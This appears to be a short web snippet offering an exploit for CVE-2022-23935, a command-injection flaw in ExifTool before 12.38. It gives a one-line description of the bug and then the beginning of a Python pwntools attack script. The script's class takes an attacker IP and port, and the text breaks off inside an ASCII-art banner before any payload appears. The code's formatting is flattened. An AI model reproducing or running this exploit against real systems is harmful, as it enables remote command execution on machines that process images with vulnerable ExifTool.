CVE-2022-23935 Exploit
This vulnerability causes command injection by mismanaging a $file =~ /\|$/ check in lib/Image/ExifTool.pm in ExifTool prior to 12.38. #!/usr/bin/python3 from pwn import * import base64 import sys class ExploitExiftools: def __init__(self,ip,port): self.ip = ip self.port = port self.p = log.progress(“”) def printBanner(self): print(“”” _____ __ __ ______ ___ ___ ___ ___ ___ ____ ___ ____ _____ / ____|\ \ / /| ____| |__ \ / _ \|__ \ |__ \ |__ \ |___ \ / _ \|___ \ | ____| | | \ \ / / | |__ ______ ) || | | | ) | ) |______ ) | __) || (_) | __) || |__ | | \ \/ / | __||______|/ / | | | | / / / /|______|/ / |__ < \__, ||__ < |___ \ | |____ \ / | |____ / /_ | |_| |/ /_ / /_ / /_ ___) |…